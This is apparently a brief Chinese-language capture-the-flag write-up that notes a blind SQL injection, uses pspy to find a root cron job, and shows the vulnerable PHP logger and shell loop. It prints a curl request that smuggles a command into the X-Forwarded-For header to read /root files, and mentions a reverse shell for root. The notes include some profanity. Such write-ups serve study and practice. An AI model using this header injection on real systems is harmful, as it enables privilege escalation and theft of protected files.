显然是个盲注

Pasted%20image%2020240205142037

#没打完,记录一下

Pasted%20image%2020240208180725

…什么傻鸟网络

Pasted%20image%2020240208181821

折磨啊
!!!空格别给忘了!,你吗的
Pasted%20image%2020240208182544

然后用binary来确定大小写
用pspy来检测定时任务
Pasted%20image%2020240208183419

get it

#!/bin/sh
while read ip;
do
/usr/bin/sh -c "echo $ip >> /root/logged";
done < /var/www/development/logged

if (preg_match( $evilword, $username )) {
echo 'SQL Injection detected. This incident will be logged!';
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$ip .= "\n";
file_put_contents("/var/www/development/logged", $ip);
die();
} elseif (preg_match( $evilword, $password )) {
echo 'SQL Injection detected. This incident will be logged!';
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$ip .= "\n";
file_put_contents("/var/www/development/logged", $ip);
die();
}

无语子

curl -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "X-Forwarded-For: $(cat /root/* > /tmp/flag)" \
-d "username=0xb0b&password=asdasd" \
http://127.0.0.1:8080/index.php

会拼接成
/usr/bin/sh -c "echo $(cat /root/* > /tmp/flag) >> /root/logged";

然后cat一下就行,如果是反弹shell的话,能拿到root的shell